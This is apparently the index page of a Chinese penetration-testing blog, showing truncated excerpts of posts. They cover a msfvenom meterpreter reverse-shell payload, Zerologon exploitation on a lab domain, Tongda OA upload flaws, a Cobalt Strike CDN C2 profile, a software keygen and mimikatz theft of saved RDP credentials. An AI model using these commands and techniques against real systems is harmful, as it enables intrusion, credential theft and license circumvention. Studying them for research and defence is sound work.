Sp4ce's Blog

记录下Volatility使用过程 环境 Parrot *1 Windows 2008*1 先生成个msf马子 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.17.6 LPORT=4444 -a x64 -f exe -o /home/parrot/Desktop/1.exe 拷到Windows2008机器上运行后迁移进程 然后使用dumpit对内存做完整镜像 做好后的镜像大小取决于机器内存的大小，机器内存越大，镜像后的文件越大 拷回parrot，开始分析 分析命令如下 volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw --profile=Win7SP1x64 malfind查找疑似被注入的进程，这里应该先执行volatility -f /home/parrot/Desktop/WIN-L74K1LLT618-20250823-093248.raw imageinfo来确定使用配置文件的 ┌─[[email protected] ...

背景项目中碰到个用ionCube V10加密的源码，需要解密做审计，记录下踩的坑 文件数量2000多，找了一番网站发现https://easytoyou.eu/可以提供解密服务， BTW，这个站一次只能上传一个文件，手动点2000多次不说累死也得烦死 过程按照惯例，先注册个号看看有什么功能 好嘛 10欧元30天会员，冲了再看看解密面板 面板变了，上传个加密的文件抓个包看看 解密完成后在页面中回显下载链接，那么就可以写脚本批量跑了。 思路脚本需要实现的功能是遍历所有指定格式的文件，保存获取到的列表，上传解密，下载解密后的文件 直接贴代码 遍历符合格式的文件代码# Load Foldersdef get_all_path(self): if os.path.exists(self.FileList): pass else: postfix = set(['php']) # 设置要记录的文件格式 for maindir, subdir, file_name_list in os.walk(self.dstFolder): ...

环境 域林环境 根DC：10.100.100.100（server2019） 一级林DC：10.100.100.101（server2016） 二级林DC：10.100.100.102（server2012R2） 跳板机（攻击机）：10.100.100.105（WIN10） 简要拓扑 过程 利用过程：将域控机器账户密码设置为空->读取域管hash->读取sam文件hash(ntds.dit)->恢复域控机器账户密码 攻击首先安装impacket: git clone https://github.com/SecureAuthCorp/impacket.gitcd impacketpip install -r requirements.txtpython setup.py install 然后下载利用脚本 git clone https://github.com/dirkjanm/CVE-2020-1472cd CVE-2020-1472 直接拿根域测，执行 python cve-2020-1472-exploit.py AD 10.100.100.100 ...

学习审计通达OA时发现的一些有意思的事 全局变量覆盖审计时发现前辈们提到了这个问题，跟了下存在问题的文件 比如存在变量覆盖的文件是pda\vote\list.php， require_once "pda/auth.php";include_once "inc/conn.php";include_once "inc/utility_all.php";include_once "mobile/api/qyapp.vote.class.php";if ($P == "") { $P = $_COOKIE["PHPSESSID"];}else { $P = $_GET["P"];} 这里包含了inc/conn.php数据库连接文件 继续跟，发现包含了inc/td_config.php <?phpinclude_once "inc/common.inc.php";$ROOT_PATH = ($_SERVER["DOCUMENT_ROOT"] ? $_SERVER["DOCUMENT_ROOT"] : "");if ($ROOT_PATH == ...

您好, 这里需要密码.223ac6844fb0a37fce3421dc9062f07eae9f3fcff9b5225ac004648d5db08880133b543481d8f0f41f2fb1fb595931bcd3ddb9e34ce8baeb8e0b478fff08d713ab7a152b1ce61085e20f6dafa92518c832f61bf4573e8039969758e44b06bc83ec3131914ceb22c5f1a4df43a04c0ce01bba5d5f1c1ed11cb5a3aa8224c72a87359ce9b24c92777ed2831bd31c7b348219b5c159d1edaf10a70be744cc3b2c45045179354723565d3d5dea2e309b42bae6d0abe3192fc48d58871e8fa98fd028a26fc25e87309a8c9167695bbc3e5d4c3919e7439c6c45fd6ea9ddc715ef3d7c5b3097e2f78db2ee7aa301f4eca85a2d923896c77 ...

学习下CS通过CDN上线 所需 域名*1 CDN*1 VPS*1 部署域名购买后将DNS更改为CDN服务商的DNS服务器，然后等待生效 以CF为例，生效后会给邮箱发一封邮件 然后配置解析域名 CS配置文件 C2.profile ### # @Author : Sp4ce # @Date : 2020-07-15 11:59:42 # @LastEditors : Sp4ce # @LastEditTime : 2020-07-15 15:14:57 # @Description : Challenge Everything.### set sample_name "Etumbot";set sleeptime "2000";set jitter "0";set maxdns "255";set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";http-get { set uri "/image/ ...

您好, 这里需要密码.58cc31d2a5ffa547a5231a78ad12f908ebf32328cb4ad707322d590d8bee86542959e0f428099d962cb7d3635b3357cee6235494c007f8cdedb267add9ae449d7b3e057fe94f117443540fa25536f8495c5c8cbf740d9f5b2ff4c6169ca7e58b9422c46c2eb29540f2226d161bb7066487e72b489f21e279d605ae30186809553fb9458a8fad16409f534bea7074a49045b4c13568c88dfc19d2e64f654a02a8278a58f3e02007dd62d43db6da95cff54679d54cfd8dac067944f3a7b8f64f92931b58854b09a78ee22cc474bc67d6b15146e1d15f018930e4e837a9b2e02cbde0a2302367faac3c0413f115443ce444897f6aacb ...

通达OA官方于2020-03-13发布了安全更新，修复了任意文件上传（2013、2013adv、2015、2016、2017、V11）和文件包含（V11）漏洞，从官网下到源码解密后，简单看了下 直接看主流的2017、V11产品吧，这个系列产品有全版本的变量覆盖问题 V11、2017任意上传以2017为例 补丁文件路径：2020_A1\2017版\ispirit\im\upload.php 左侧为原始代码，右侧为补丁，可以看到直接将鉴权的文件从else里释放了出来，避免了第5行传入P值导致的权限绕过问题 继续往下看任意文件上传的问题 $TYPE = $_POST["TYPE"];//获取TYPE$DEST_UID = $_POST["DEST_UID"];//获取DEST_UID（接收方ID）$dataBack = array();if (($DEST_UID != "") && !td_verify_ids($ids)) { $dataBack = array("status" => 0, "content" => "-ERR " . _(" ...

做项目时发现一个站点为前后分离的架构，翻了下发现了map文件，采用restore-source-tree还原时报错，记录下解决过程 安装先从git克隆到本地 git clone https://github.com/laysent/restore-source-tree.git 然后进入文件夹 npm install 这里建议挂个代理、VPN，国内很慢 这里在win下会报错 λ npm cinstall npm WARN deprecated [email protected]: � Thanks for using Babel: we recommend using babel-preset-env now: please read https://bab ...

抽空研究了下ALV的注册机制，写了个注册机 分析ALV的注册方法是unlockCodeToolStripMenuItem_Click方法，当点击Unlock按钮时会触发注册事件并调用Class2类中的smethod_1、smethod_02个方法进行校验，详细流程见如下代码 unlockCodeToolStripMenuItem_Click方法 private void unlockCodeToolStripMenuItem_Click(object sender, EventArgs e) { string text = this.prefs_0.Key; if (!InputForm.smethod_3("Apache Logs Viewer | " + Class96.smethod_264(), Class96.smethod_143(), ref text)) { return; } if (text != null) { text = text.Trim(); } if (string.IsNul ...

您好, 这里需要密码.4742c31a377a00ccced49d9967690390e19d3b0298c575d0bf855534aa155e29de8d9c995ea1a5ec16ade6168aaf284e59e2642a2e6b9884396b993a1c66516858ce6a89ff565bd013511db1e6088107c4329d2b6b49ba4c866bf9923fb91fa64fc17a2aa66f18784282ecd9d077edff692dcc8304b388406f0cc839e3303d14b4f8c86273307b83cbc8f01a1cac4b29199821f12f6a76a22bc5cdb8114a32a7cde2744c50ea8268f69d15cf99abd25d60902396b633828fe86f57ab50e4fd49e82582f2bc6c21b9ff2a432754ae0a229980714cb5f3002067da86096edb6aca2cb318ec30f2a213f1ca357bf1ea32e239781f9f3 ...

拿下一台运维机，上了个CS，发现曾经连接过几台服务器并且保存了凭据，网上查了圈发现CS不支持交互式mimikatz，记录下获取远程主机RDP凭据。 Windows保存RDP凭据的目录是C:\Users\用户名\AppData\Local\Microsoft\Credentials 可通过命令行获取，执行: cmdkey /list或powerpick Get-ChildItem C:\Users\rasta_mouse\AppData\Local\Microsoft\Credentials\ -Force注意:cmdkey /list命令务必在Session会话下执行，system下执行无结果。 使用cobalt strike中的mimikatz可以获取一部分接下来要用到的masterkey和pbData mimikatz dpapi::cred /in:C:\Users\USERNAME\AppData\Local\Microsoft\Credentials\SESSIONID 输出应类似 **BLOB** dwVersion : 00000001 - 1 ...